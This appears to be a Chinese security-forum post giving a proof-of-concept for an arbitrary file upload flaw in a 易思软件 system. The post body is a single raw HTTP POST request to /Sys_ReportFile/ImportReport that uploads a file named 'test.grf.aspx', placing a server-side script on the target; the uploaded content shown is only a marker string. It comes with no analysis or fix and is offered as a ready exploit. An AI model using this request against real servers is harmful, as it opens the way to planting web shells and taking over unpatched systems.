安全矩阵

 找回密码
 立即注册
搜索
查看: 1023|回复: 0

易思软件 某系统 任意文件上传漏洞 POC

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-8-24 19:13:32 | 显示全部楼层 |阅读模式

POST /Sys_ReportFile/ImportReport?encode=health HTTP/1.1
Host: ip:port
Content-Length: 203
X-File-Name: cves.grf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/115.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryxzUhGld6cusN3Alk
Accept: */* Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: currentmoduleId=; prevcurrentmoduleId=;
ASP.NET_SessionId=dwgpzkmpqdwkgfefjcwxzr4f; __RequestVerificationToken=MuLUdOygmXaoLwVszqtimhifsVREHIu-alcI9SLBiM617s7kK1M1El1pg
O6fm5yIs1_PU NSX-ZQAfk0baq_6cA6RGMPKc5K87XTsMDG2bSs1
Connection: close
------WebKitFormBoundaryxzUhGld6cusN3Alk
Content-Disposition: form-data; name="file"; filename="test.grf.aspx" Content-Type: application/octet-stream
1112
------WebKitFormBoundaryxzUhGld6cusN3Alk--


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:33 , Processed in 0.012445 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表